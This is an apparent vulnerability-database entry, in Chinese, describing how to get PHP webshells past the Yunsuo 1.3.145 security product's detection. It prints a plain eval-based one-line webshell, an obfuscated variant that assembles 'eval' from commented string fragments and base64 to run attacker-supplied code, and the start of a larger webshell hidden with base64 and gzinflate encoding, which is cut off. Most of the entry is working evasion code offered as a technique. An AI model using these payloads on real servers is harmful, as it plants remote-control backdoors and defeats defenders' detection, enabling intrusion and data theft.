云锁最新版1.3.145绕过webshell检测

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: webshell检测绕过 ### 详细说明: 一句话马+大马绕过检测 ### 漏洞证明: 1.一句话木马,单纯用<?php eval($_POST[1])?>这种方式肯定会被检测到,我们采用这种方式: ``` <?php $jm='MQ=='; $s=base64_decode($jm); $a="e"./*-/*-*/"v"./*-/*-*/"a"./*-/*-*/"l"; $b=base64_encode($a); $c=base64_decode($b); $c($_REQUEST[$s]); ?> ``` 结果发现只有一开始说的那种文件被检测到: [<img src="https://images.seebug.org/upload/201412/30203052747770e0f3c789deff0f1fd74a7b2d06.jpg" alt="y.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/30203052747770e0f3c789deff0f1fd74a7b2d06.jpg) 2.大马,采用base64+gzinflate压缩编码,大马文件如下: ``` <?php function CLsI($ZzvSWE) { $ZzvSWE=gzinflate(base64_decode($ZzvSWE)); for($i=0;$i<strlen($ZzvSWE);$i++) { $ZzvSWE[$i] = chr(ord($ZzvSWE[$i])-1); } return $ZzvSWE;...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息